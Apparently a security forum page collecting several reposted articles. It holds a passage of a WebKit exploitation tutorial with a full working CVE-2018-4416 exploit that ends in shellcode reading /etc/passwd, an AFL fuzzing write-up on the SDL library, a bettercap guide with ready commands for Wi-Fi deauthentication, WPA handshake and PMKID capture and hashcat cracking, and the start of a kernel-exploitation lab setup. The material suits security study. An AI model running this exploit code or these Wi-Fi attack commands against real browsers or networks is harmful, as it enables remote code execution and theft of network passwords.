8d 45 b0 49 bb b8 2e c1 af ..H.E.H.E.I..... 0x00007fffafe02a20 ff 7f 00 00 49 39 03 0f 87 9c 00 00 00 48 8b 4d ....I9.......H.M 0x00007fffafe02a30 30 48 b8 00 00 00 00 00 00 ff ff 48 39 c1 0f 82 0H.........H9... Put you dump byte to rasm2: rasm -d "you dump byte here" push ebp dec eax mov ebp, esp dec eax lea esp, [ebp - 0x30] dec eax mov eax, 0xaf450c60 invalid jg 0x11 add byte [eax - 0x77], cl inc ebp adc byte [eax - 0x73], cl inc ebp mov al, 0x49 mov ebx, 0xafc12eb8 invalid jg 0x23 add byte [ecx + 0x39], cl add ecx, dword [edi] xchg dword [eax + eax - 0x74b80000], ebx dec ebp xor byte [eax - 0x48], cl add byte [eax], al add byte [eax], al add byte [eax], al invalid dec dword [eax + 0x39] ror dword [edi], 0x82 Emmmm…the disassembly code is partially incorrect. At least we can see a draft now. 1 Day Exploitation Let’s use the bug in triggering bug section: CVE-2018-4416. It’s a type confusion. Since we already talked about WebKid, a similar CTF challenge which has type confusion bug, it won’t be difficult to understand this one. Switch to the vulnerable branch and start our journey. PoC is provided at the beginning of the article. Copy and paste the int64.js, shellcode.js, and utils.js from WebKid repo to your virtual machine. Root Cause Quotation from Lokihardt The following is description of CVE-2018-4416 from Lokihardt, with my partial highlight. When a for-in loop is executed, a JSPropertyNameEnumerator object is created at the beginning and used to store the information of the input object to the for-in loop. Inside the loop, the structure ID of the “this” object of every get_by_id expression taking the loop variable as the index is compared to the cached structure ID from the JSPropertyNameEnumerator object. If it’s the same, the “this” object of the get_by_id expression will be considered having the same structure as the input object to the for-in loop has. The problem is, it doesn’t have anything to prevent the structure from which the cached structure ID from being freed. As structure IDs can be reused after their owners get freed, this can lead to type confusion. Line by Line Explanation Comment in /* */ is my analysis, which might be inaccurate. Comment after // is by Lokihardt: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } /* Step 3 */ /* This is abother target */ /* We want to confuse it(tmp) with obj(fake_object_memory) */ let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. /* Step 4 */ /* Change the structure of tmp to {} */ tmp.__proto__ = {}; gc(); /* The structure of obj is also {} now */ obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. /* Step 5 */ /* Compiler believes obj and tmp share the same type now */ /* Thus, obj[k] will retrieve data from object with offset a */ /* In the patched version, it should be undefined */ return obj[k]; // Type confusion. } } /* Step 0 */ /* Prepare structure {} */ opt({}); /* Step 1 */ /* Target Array, 0x1234 is our fake address*/ let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; /* Step 2 */ /* Trigger type confusion*/ let fake_object = opt(fake_object_memory); /* JSC crashed */ print(fake_object); Debugging Let’s debug it to verify our thought. I modify the original PoC for easier debugging. But they are almost identical except additional print(): function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. debug("Confused Object: " + describe(obj)); return obj[k]; // Type confusion. } } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x41424344; let fake_object = opt(fake_object_memory); print() print(fake_object) Then gdb ./jsc, b *printInternal, and r poc.js. We can get: ... --> Confused Object: Object: 0x7fffaf6b0080 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Object, {}, NonArray, Proto:0x7fffaf6b3e80, Leaf]), StructureID: 142 --> Confused Object: Object: 0x7fffaf6cbe40 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Uint32Array, {}, NonArray, Proto:0x7fffaf6b3e00, Leaf]), StructureID: 142 ... Let’s take a glance at our fake address. JSC is too large to find your dream breakpoint. Let’s set a watchpoint to track its flow instead: gef> x/4gx 0x7fffaf6cbe40 0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000 0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064 gef> x/4gx 0x00007fe8014fc000 0x7fe8014fc000: 0x0000000041424344 0x0000000000000000 0x7fe8014fc010: 0x0000000000000000 0x0000000000000000 gef> rwatch *0x7fe8014fc000 Hardware read watchpoint 2: *0x7fe8014fc000 We get expected output later: Thread 1 "jsc" hit Hardware read watchpoint 2: *0x7fe8014fc000 Value = 0x41424344 0x00005555555bebd4 in JSC::JSCell::structureID (this=0x7fe8014fc000) at ../../Source/JavaScriptCore/runtime/JSCell.h:133 133 StructureID structureID() const { return m_structureID; } But why does it show at structure ID? We can get answer from their memory layout: obj (fake_object_memory): 0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000 0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064 tmp ({a: 1}): 0x7fffaf6cbdc0: 0x000016000000008b 0x0000000000000000 0x7fffaf6cbdd0: 0xffff000000000001 0x0000000000000000 So, the pointer of Uin32Array is returned as an object. And m_structureID is at the beginning of each JS Objects. Since 0x1234 is the first element of our array, it’s reasonable for structureID() to retrieve it. We can use data in Uint32Array to craft fake object now. Awesome! Constructing Attack Primitive addrof Now, we should craft a legal object. I choose {} (an empty object) as our target. How does an empty look like in memory(ignore scripting and debugging here): 0x7fe8014fc000: 0x010016000000008a 0x0000000000000000 Okay, it begins with 0x010016000000008a. We can simulate it in Uint32Array handy(remember to paste gc and opt to here): function gc() { ... // Same as above's } function opt(obj) { ... // Same as above;s } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); fake_object.a = {} print(fake_object_memory[4]) print(fake_object_memory[5]) Two mystery numbers are returned: 2591768192 # hex: 0x9a7b3e80 32731 # hex: 0x7fdb Obviously, it is in pointer format. We can leak arbitrary object now! fakeobj Getting a fakeob is almost identical to crafting addrof. The difference is that you need to fill an address to UInt32Array, then get the object via attribute a in fake_object Arbitrary R/W and Shellcode Execution It’s similar to the exploit script in WebKid challenge. The full script is too long to explain line by line. You can, however, find it here. You may need to try around 10 rounds to exploit successfully. It will read your /etc/passwd when succeed. Here is the core code: // get compiled function var func = makeJITCompiledFunction(); function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } // Typr confusion here function opt(obj) { for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // Compiler are misleaded that obj and tmp shared same type return obj[k]; } } opt({}); // Use Uint32Array to craft a controable memory // Craft a fake object header let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); debug(describe(fake_object)) // Use JIT to stablized our attribute // Attribute a will be used by addrof/fakeobj // Attrubute b will be used by arbitrary read/write for (i = 0; i < 0x1000; i ++) { fake_object.a = {test : 1}; fake_object.b = {test : 1}; } // get addrof // we pass a pbject to fake_object // since fake_object is inside fake_object_memory and represneted as integer // we can use fake_object_memory to retrieve the integer value function setup_addrof() { function p32(num) { value = num.toString(16) return "0".repeat(8 - value.length) + value } return function(obj) { fake_object.a = obj value = "" value = "0x" + p32(fake_object_memory[5]) + "" + p32(fake_object_memory[4]) return new Int64(value) } } // Same // But we pass integer value first. then retrieve object function setup_fakeobj() { return function(addr) { //fake_object_memory[4] = addr[0] //fake_object_memory[5] = addr[1] value = addr.toString().replace("0x", "") fake_object_memory[4] = parseInt(value.slice(8, 16), 16) fake_object_memory[5] = parseInt(value.slice(0, 8), 16) return fake_object.a } } addrof = setup_addrof() fakeobj = setup_fakeobj() debug("[+] set up addrof/fakeobj") var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); debug('[+] exploit primitives working'); // Use fake_object + 0x40 cradt another fake object for read/write var container_addr = Add(addrof(fake_object), 0x40) fake_object_memory[16] = 0x00001000; fake_object_memory[17] = 0x01082007; var structs = [] for (var i = 0; i < 0x1000; ++i) { var a = [13.37]; a.pointer = 1234; a['prop' + i] = 13.37; structs.push(a); } // We will use victim as the butterfly pointer of contianer object victim = structs[0x800] victim_addr = addrof(victim) victim_addr_hex = victim_addr.toString().replace("0x", "") fake_object_memory[19] = parseInt(victim_addr_hex.slice(0, 8), 16) fake_object_memory[18] = parseInt(victim_addr_hex.slice(8, 16), 16) // Overwrite container to fake_object.b container_addr_hex = container_addr.toString().replace("0x", "") fake_object_memory[7] = parseInt(container_addr_hex.slice(0, 8), 16) fake_object_memory[6] = parseInt(container_addr_hex.slice(8, 16), 16) var hax = fake_object.b var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. // we change the butterfly of victim to addr + 0x10 // when victim change the pointer attribute, it will read butterfly - 0x10 // which equal to addr + 0x10 - 0x10 = addr // read arbiutrary value is almost the same writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; memory.test(); debug("[+] limited memory read/write working"); // Get JIT code address debug(describe(func)) var funcAddr = memory.addrof(func); debug(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); debug(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); debug(`[+] JITCode instance @ ${jitCodeObjAddr}`); var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); //var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); debug(`[+] JITCode @ ${jitCodeAddr}`); // Our shellcode var shellcode = [0xeb, 0x3f, 0x5f, 0x80, 0x77, 0xb, 0x41, 0x48, 0x31, 0xc0, 0x4, 0x2, 0x48, 0x31, 0xf6, 0xf, 0x5, 0x66, 0x81, 0xec, 0xff, 0xf, 0x48, 0x8d, 0x34, 0x24, 0x48, 0x89, 0xc7, 0x48, 0x31, 0xd2, 0x66, 0xba, 0xff, 0xf, 0x48, 0x31, 0xc0, 0xf, 0x5, 0x48, 0x31, 0xff, 0x40, 0x80, 0xc7, 0x1, 0x48, 0x89, 0xc2, 0x48, 0x31, 0xc0, 0x4, 0x1, 0xf, 0x5, 0x48, 0x31, 0xc0, 0x4, 0x3c, 0xf, 0x5, 0xe8, 0xbc, 0xff, 0xff, 0xff, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x41] var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); // write shellcode shellcode.push(...strData.bytes()); memory.write(jitCodeAddr, shellcode); // trigger and get /etc/passwd func(); print() Acknowledgement Thanks to Sakura0 who guides me from the sketch. Otherwise, this post will come out much slower. I will also acknowledge all the authors in the reference list. Your share encourages the whole info-sec community! References Groß S, 2018, Black Hat USA, “Attacking Client-Side JIT Compilers” Han C, “js-vuln-db” Gianni A and Heel1an S, “Exploit WebKit Heap” Filip Pizlo, http://www.filpizlo.com, Thanks for many presentations! Groß S, 2018, 35C3 CTF WebKid Challenge dwfault, 2018, WebKit Debugging Skills Tags: WebKit Categories: Tutorial Updated: December 05, 2018 Sursa: https://www.auxy.xyz/tutorial/Webkit-Exp-Tutorial/#acknowledgement
    1 point
  15. Blog How to Use Fuzzing in Security Research SHARE: Facebook Twitter LinkedIn February 12, 2019 by Radu-Emanuel Chiscariu Introduction Fuzzing is one of the most employed methods for automatic software testing. Through fuzzing, one can generate a lot of possible inputs for an application, according to a set of rules, and inject them into a program to observe how the application behaves. In the security realm, fuzzing is regarded as an effective way to identify corner-case bugs and vulnerabilities. There are a plethora of fuzzing frameworks, both open-source projects and commercial. There are two major classes of fuzzing techniques: Evolutionary-based fuzzing: They employ genetic algorithms to increase code coverage. They will modify the supplied test cases with the purpose to reach further into the analyzed application. Intuitively, this requires some form of code instrumentation to supply feedback to the mutation engine. Evolutionary-based fuzzers are, in general, oblivious of the required input format, sort of ‘learning’ it along the way. This technique is well supported and maintained in the open-source community. State-of-the-art tools include American Fuzzy Lop (AFL), libFuzzer, and honggfuzz. Generational-based fuzzing: As opposed to evolutionary-based fuzzers, they build an input based on some specifications and/or formats that provide context-awareness. State-of-the-art commercial tools include Defensics and PeachFuzzer, and open source tools include Peach, Spike, and Sulley. This classification is not mutually exclusive, but more of a general design distinction. There are tools that include both techniques, such as PeachFuzzer. Here at the Application and Threat Intelligence (ATI) Research Center, one of our objectives is to identify vulnerabilities in applications and help developers fix them before they are exploited. This is done by connecting different applications and libraries to our fuzzing framework. This article will show how we use fuzzing in our security research by highlighting some of our findings while investigating an open-source library. Fuzzing THE SDL Library The Simple DirectMedia Layer (SDL) is a cross-platform library that provides an API for implementing multimedia software, such as games and emulators. Written in C, it is actively maintained and employed by the community. Choosing a Fuzzing Framework We are going to fuzz SDL using the well-known AFL. Written by lcamtuf, AFL uses runtime-guided techniques, compile-time instrumentation, and genetic algorithms to create mutated input for the tested application. It has an impressive trophy case of identified vulnerabilities, which is why it is considered one of the best fuzzing frameworks out there. Some researchers studied AFL in detail and came up with extensions that modify the behavior of certain components, for example the mutation strategy or importance attributed to different code branches. Such projects gave rise to FairFuzz, AFL-GO, afl-unicorn, AFLSmart, and python-AFL. We are going to use AFLFast, a project that implemented some fuzzing strategies to target not only high-frequency code paths, but also low-frequency paths, “to stress significantly more program behavior in the same amount of time.” In short, during our research, we observed that for certain fuzzing campaigns, this optimization produces an approximate 2x speedup improvement and a better overall code coverage compared to vanilla AFL. Fuzzing Preparation To use AFL, you must compile the library’s sources with AFL’s compiler wrappers. $ ./configure CC=afl-clang-fast \ CFLAGS ="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" \ LDFLAGS="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" $ make; sudo make install As observed, we will use both the AFL instrumentation and the ASAN (Address Sanitizer) compiler tool, used to identify memory-related errors. As specified here, ASAN adds a 2x slowdown to execution speed to the instrumented program, but the gain is much higher, allowing us to possibly detect memory-related issues such as: Use-after-free (dangling pointer dereference) Heap buffer overflow Stack buffer overflow Global buffer overflow Use after return Use after scope Initialization order bugs Memory leaks Furthermore, to optimize the fuzzing process, we compile the sources with: -D_FORTIFY_SOURCE=0 (ASAN doesn't support source fortification, so disable it to avoid false warnings) -O2 (Turns on all optimization flags specified by -O ; for LLVM 3.6, -O1 is the default setting) Let’s check if the settings were applied successfully: $ checksec /usr/local/lib/libSDL-1.2.so.0 [*] '/usr/local/lib/libSDL-1.2.so.0' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ASAN: Enabled Checksec is a nice tool that allows users to inspect binaries for security options, such as whether the binary is built with a non-executable stack (NX), or with relocation table as read-only (RELRO). It also checks whether the binary is built with ASAN instrumentation, which is what we need. It is part of the pwntools Python package. As observed, the binaries were compiled with ASAN instrumentation enabled as we wanted. Now let’s proceed to fuzzing! Writing a Test Harness An AFL fuzzing operation consists of three primary steps: Fork a new process Feed it an input modified by the mutation engine Monitor the code coverage by keeping a track of which paths are reached using this input, informing you if any crashes or hangs occurred This is done automatically by AFL, which makes it ideal for fuzzing binaries that accept input as an argument, then parse it. But to fuzz the library, we must first make a test harness and compile it. In our case, a harness is simply a C program that makes use of certain methods from a library, allowing you to indirectly fuzz it. #include <stdlib.h> #include "SDL_config.h" #include "SDL.h" struct { SDL_AudioSpec spec; Uint8 *sound; /* Pointer to wave data */ Uint32 soundlen; /* Length of wave data */ int soundpos; /* Current play position */ } wave; /* Call this instead of exit(), to clean up SDL. */ static void quit(int rc){ SDL_Quit(); exit(rc); } int main(int argc, char *argv[]){ /* Load the SDL library */ if ( SDL_Init(SDL_INIT_AUDIO) < 0 ) { fprintf(stderr, "[-] Couldn't initialize SDL: %s\n",SDL_GetError()); return(1); } if ( argv[1] == NULL ) { fprintf(stderr, "[-] No input supplied.\n"); } /* Load the wave file */ if ( SDL_LoadWAV(argv[1], &wave.spec, &wave.sound, &wave.soundlen) == NULL ) { fprintf(stderr, "Couldn't load %s: %s\n", argv[1], SDL_GetError()); quit(1); } /* Free up the memory */ SDL_FreeWAV(wave.sound); SDL_Quit(); return(0); } Our intention here is to initialize the SDL environment, then fuzz the SDL_LoadWAV method pertaining to the SDL audio module. To do that, we will supply a sample WAV file, with which AFL will tamper using its mutation engine to go as far into the library code as possible. Introducing some new fuzzing terminology, this file represents our initial seed, which will be placed in the corpus_wave folder. Let’s compile it: $ afl-clang-fast -o harness_sdl harness_sdl.c -g -O2 \ -D_FORTIFY_SOURCE=0 -fsanitize=address \ -I/usr/local/include/SDL -D_GNU_SOURCE=1 -D_REENTRANT \ -L/usr/local/lib -Wl,-rpath,/usr/local/lib -lSDL -lX11 -lpthread And start the fuzzing process: $ afl-fuzz -i corpus_wave/ -o output_wave -m none -M fuzzer_1_SDL_sound \ -- /home/radu/apps/sdl_player_lib/harness_sdl @@ As you can see, starting a fuzzing job is easy, we just execute afl-fuzz with the following parameters: The initial corpus ( -i corpus_wave ) The output of the fuzzing attempt ( -o output_wave ) Path to the compiled harness Instruct AFL how to send the test sample to the fuzzed program ( @@ for providing it as an argument) Memory limit for the child process ( -m none since ASAN needs close to 20TB of memory on x86_64 architecture) There are other useful parameters that you can use, such as specifying a dictionary containing strings related to a certain file format, which would theoretically help the mutation engine reach certain paths quicker. But for now, let’s see how this goes. My display is ok, that is just a mountain in the back. We are conducting this investigation on a machine with 32GB of RAM, having 2 AMD Opteron 6328 CPUs, each with 4 cores per socket and 2 threads per core, giving us a total of 16 threads. As we can observe, we get 170 evaluated samples per second as the fuzzing speed. Can we do better than that? Optimizing for Better Fuzzing Speed Some of the things we can tweak are: By default, AFL forks a process every time it tests a different input. We can control AFL to run multiple fuzz cases in a single instance of the program, rather than reverting the program state back for every test sample. This will reduce the time spent in the kernel space and improve the fuzzing speed. This is called AFL_PERSISTENT mode. We can do that by including the __AFL_LOOP(1000) macro within our test harness. According to this, specifying the macro will force AFL to run 1000 times, with 1000 different inputs fed to the library. After that, the process is restarted by AFL. This ensures we regularly replace the process to avoid memory leaks. The test case specified as the initial corpus is 119KB, which is too much. Maybe we can find a significantly smaller test case? Or provide more test cases, to increase the initial code coverage? We are running the fuzzer from a hard disk. If we switch to a ramdisk, forcing the fuzzer to get its testcases directly from RAM, we might get a boost from this too. Last but not the least, we can run multiple instances in parallel, enforcing AFL to use 1 CPU for one fuzzing instance. Let’s see how our fuzzer performs with all these changes. Run, Fuzzer, run! For one instance, we get a 2.4x improvement speed and already a crash! Running one master instance and four more slave instances, we get the following stats: $ afl-whatsup -s output_wave/ status check tool for afl-fuzz by <lcamtuf@google.com> Summary stats ============= Fuzzers alive : 5 Total run time : 0 days, 0 hours Total execs : 0 million Cumulative speed : 1587 execs/sec Pending paths : 6 faves, 35 total Pending per fuzzer : 1 faves, 7 total (on average) Crashes found : 22 locally unique With 5 parallel fuzzers, we get more than 1500 executions per second, which is a decent speed. Let’s see them working! Results After one day of fuzzing, we got a total of 60 unique crashes. Triaging them, we obtained 12 notable ones, which were reported to the SDL community and MITRE. In effect, CVE-2019-7572, CVE-2019-7573, CVE-2019-7574, CVE-2019-7575, CVE-2019-7576, CVE-2019-7577, CVE-2019-7578, CVE-2019-7635, CVE-2019-7636, CVE-2019-7637, CVE-2019-7638 were assigned. The maintainers of the library acknowledged that the vulnerabilities are present in the last version (2.0.9) of the library as well. Just to emphasize the fact that some bugs can stay well-hidden for years, some of the vulnerabilities were introduced with a commit dating from 2006 and have never been discovered until now. LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS The Ixia's Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia test platforms. The ATI Research Center continuously monitors threats as they appear in the wild. Customers of our BreakingPoint product have access to strikes for different attacks, allowing them to test their currently deployed security controls’ ability to detect or block such attacks; this capability can afford you time to patch your deployed web applications. Our monitoring of in-the-wild attackers ensures that such attacks are also blocked for customers of Ixia ThreatARMOR. Sursa: https://www.ixiacom.com/company/blog/how-use-fuzzing-security-research
    1 point
  16. Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attack 2019-02-13 bettercap, deauth, handshake, hashcat, pmkid, rsn, rsn pmkid, wpa, wpa2 AddThis Sharing Buttons Share to Twitter Share to Reddit452Share to Hacker NewsShare to Facebook1.3KShare to LinkedIn In this post, I’ll talk about the new WiFi related features that have been recently implemented into bettercap, starting from how the EAPOL 4-way handshake capturing has been automated, to a whole new type of attack that will allow us to recover WPA PSK passwords of an AP without clients. We’ll start with the assumption that your WiFi card supports monitor mode and packet injection (I use an AWUS1900 with this driver), that you have a working hashcat (v4.2.0 or higher is required) installation (ideally with GPU support enabled) for cracking and that you know how to use it properly either for dictionary or brute-force attacks, as no tips on how to tune the masks and/or generate proper dictionaries will be given On newer macOS laptops, the builtin WiFi interface en0 already supports monitor mode, meaning you won’t need a Linux VM in order to run this Deauth and 4-way Handshake Capture First thing first, let’s try a classical deauthentication attack: we’ll start bettercap, enable the wifi.recon module with channel hopping and configure the ticker module to refresh our screen every second with an updated view of the nearby WiFi networks (replace wlan0 with the interface you want to use): 1 2 3 4 5 6 7 8 9 sudo bettercap -iface wlan0 # this will set the interface in monitor mode and start channel hopping on all supported frequencies > wifi.recon on # we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc` > set wifi.show.sort clients desc # every second, clear our view and present an updated list of nearby WiFi networks > set ticker.commands 'clear; wifi.show' > ticker on You should now see something like this: Assuming Casa-2.4 is the network we want to attack, let’s stick to channel 1 in order to avoid jumping to other frequencies and potentially losing useful packets: 1 > wifi.recon.channel 1 What we want to do now is forcing one or more of the client stations (we can see 5 of them for this AP) to disconnect by forging fake deauthentication packets. Once they will reconnect, hopefully, bettercap will capture the needed EAPOL frames of the handshake that we’ll later pass to hashcat for cracking (replace e0:xx:xx:xx:xx:xx with the BSSID of your target AP): 1 > wifi.deauth e0:xx:xx:xx:xx:xx If everything worked as expected and you’re close enough to the AP and the clients, bettercap will start informing you that complete handshakes have been captured (you can customize the pcap file output by changing the wifi.handshakes.file parameter): Not only bettercap will check for complete handshakes and dump them only when all the required packets have been captured, but it will also append to the file one beacon packet for each AP, in order to allow any tool reading the pcap to detect both the BSSIDs and the ESSIDs. The downsides of this attack are obvious: no clients = no party, moreover, given we need to wait for at least one of them to reconnect, it can potentially take some time. 4-way Handshake Cracking Once we have succesfully captured the EAPOL frames required by hashcat in order to crack the PSK, we’ll need to convert the pcap output file to the hccapx format that hashcat can read. In order to do so, we can either use this online service, or install the hashcat-utils ourselves and convert the file locally: 1 /path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx You can now proceed to crack the handshake(s) either by dictionary attack or brute-force. For instance, to try all 8-digits combinations: 1 /path/to/hashcat -m2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d' And this is it, the evergreen deauthentication attack in all its simplicity, performed with just one tool … let’s get to the fun part now Client-less PMKID Attack In 2018 hashcat authors disclosed a new type of attack which not only relies on one single packet, but it doesn’t require any clients to be connected to our target AP or, if clients are connected, it doesn’t require us to send deauth frames to them, there’s no interaction between the attacker and client stations, but just between the attacker and the AP, interaction which, if the router is vulnerable, is almost immediate! It turns out that a lot of modern routers append an optional field at the end of the first EAPOL frame sent by the AP itself when someone is associating, the so called Robust Security Network, which includes something called PMKID: As explained in the original post, the PMKID is derived by using data which is known to us: 1 PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) Since the “PMK Name” string is constant, we know both the BSSID of the AP and the station and the PMK is the same one obtained from a full 4-way handshake, this is all hashcat needs in order to crack the PSK and recover the passphrase! Here’s where the new wifi.assoc command comes into play: instead of deauthenticating existing clients as shown in the previous attack and waiting for the full handshake to be captured, we’ll simply start to associate with the target AP and listen for an EAPOL frame containing the RSN PMKID data. Say we’re still listening on channel 1 (since we previously wifi.recon.channel 1), let’s send such association request to every AP and see who’ll respond with useful information: 1 2 # wifi.assoc supports 'all' (or `*`) or a specific BSSID, just like wifi.deauth > wifi.assoc all All nearby vulnerable routers (and let me reiterate: a lot of them are vulnerable), will start sending you the PMKID, which bettercap will dump to the usual pcap file: PMKID Cracking We’ll now need to convert the PMKID data in the pcap file we just captured to a hash format that hashcat can understand, for this we’ll use hcxpcaptool: 1 /path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap We can now proceed cracking the bettercap-wifi.handshake.pmkid file so generated by using algorithm number 16800: 1 /path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d' Recap Goodbye airmon, airodump, aireplay and whatnots: one tool to rule them all! Goodbye Kali VMs on macOS: these modules work natively out of the box, with the default Apple hardware ❤️ Full 4-way handshakes are for n00bs: just one association request and most routers will send us enough key material. Enjoy Sursa: https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/#
    1 point
  17. Point of no C3 | Linux Kernel Exploitation - Part 0 Exploit Development exploit 3 2d In the name of Allah, the most beneficent, the most merciful. HAHIRRITATEDAHAHAHAHAHAHAHA “Appreciate the art, master the craft.” AHAHAHAHOUTDATEDAHAHAHAHAH It’s been more than a year, huh? but I’m back, with “Point of no C3”. It’s main focus will be Kernel Exploitation, but that won’t stop it from looking at other things. Summary Chapter I: Environment setup: Preparing the VM Using KGDB to debug the kernel Compiling a simple module What? Few structs Debug a module Chapter II: Overview on security and General understanding: Control Registers SMAP SMEP Write-Protect Paging(a bit of segmentation too) Processes Syscalls IDT(Interrupt Descriptor Table) KSPP KASLR kptr_restrict mmap_min_addr addr_limit Chapter I: Environment setup “No QEMU for you.” Preparing the VM: To begin with, we would set up the environment and the VM’s in order to experiment on them. For this, Debian was choosen(core only). Other choices include SUSE or Centos, etc. debian-9.4.0-amd64-netinst.iso 2018-03-10 12:56 291M [X] debian-9.4.0-amd64-xfce-CD-1.iso 2018-03-10 12:57 646M debian-mac-9.4.0-amd64-netinst.iso 2018-03-10 12:56 294M A VM is then created with atleast 35GB space.(Hey, It’s for compiling the kernel!) Installer disc image file (iso): [C:\vm\debian-9.4.0-amd64-netinst.iso [▼]] ⚠ Could not detect which operating system is in this disc image. You will need to specify which operating system will be installed. Once you boot it, you can proceed with Graphical Install, and since we only want the core, stop at Software selection and have only SSH server and standard system utilities selected. And when it’s done, you’ll have your first VM ready. Debian GNU/Linux 9 Nwwz tty1 Hint: Num Lock on Nwwz login: root Password: Linux Nwwz 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@Nwwz:~# In order to get the latest stable Linux kernel release(4.17.2 at the time of writing) and run it. We would start by installing necessary packages: apt-get install git build-essential fakeroot ncurses* libssl-dev libelf-dev ccache gcc-multilib bison flex bc Downloading the kernel tarball and the patch: root@Nwwz:~# cd /usr/src root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.17.2.tar.gz" root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/patch-4.17.2.gz" Extracting them: root@Nwwz:/usr/src# ls linux-4.17.2.tar.gz patch-4.17.2.gz root@Nwwz:/usr/src# gunzip patch-4.17.2.gz root@Nwwz:/usr/src# gunzip linux-4.17.2.tar.gz root@Nwwz:/usr/src# tar -xvf linux-4.17.2.tar Moving and applying the patch: root@Nwwz:/usr/src# ls linux-4.17.2 linux-4.17.2.tar patch-4.17.2 root@Nwwz:/usr/src# mv patch-4.17.2 linux-4.17.2/ root@Nwwz:/usr/src# cd linux-4*2 root@Nwwz:/usr/src/linux-4.17.2# patch -p1 < patch-4.17.2 Cleaning the directory and copying the original bootfile to the current working directory and changing the config with an ncurses menu: root@Nwwz:/usr/src/linux-4.17.2# make mrproper root@Nwwz:/usr/src/linux-4.17.2# make clean root@Nwwz:/usr/src/linux-4.17.2# cp /boot/config-$(uname -r) .config root@Nwwz:/usr/src/linux-4.17.2# make menuconfig One must then set up the following fields: [*] Networking support ---> Device Drivers ---> Firmware Drivers ---> File systems ---> [X] Kernel hacking 